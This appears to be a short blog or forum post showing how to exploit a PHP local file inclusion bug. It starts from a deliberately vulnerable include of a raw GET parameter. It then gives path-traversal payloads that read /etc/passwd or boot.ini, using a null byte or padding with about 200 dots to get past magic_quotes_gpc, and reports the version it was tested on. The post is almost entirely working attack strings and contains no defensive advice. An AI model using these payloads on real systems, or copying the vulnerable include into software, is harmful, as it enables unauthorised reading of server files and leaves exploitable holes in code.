So, lets look at a piece of code:
<?php include('inc/'.$_GET['page'].'php'); ?>
Normally, you would use the null byte (%00) to exploit it:
vuln.php?page=../../../../../etc/passwd%00
but if magic_quote_gpc is enabled than the null byte(%00) will get converted to /0, implying that the attack will fail.
How to bypass this: it you add a large number of dots (.....) than the null byte will not get escaped null byte is not required. e.g.
vuln.php?
page=../../../../../etc/passwd%00................................................................................(200 dots in this case)
vuln.php?page=../../../../../etc/passwd................................................................................(200 dots in this case)
Correction: You don't need null byte here.
Update: As pointed out by Bodgan, this only works for windows. So replace /etc/passwd with /../../boot.ini. I will provide a POC link
tested on php version: 5.2.12 (wamp environment)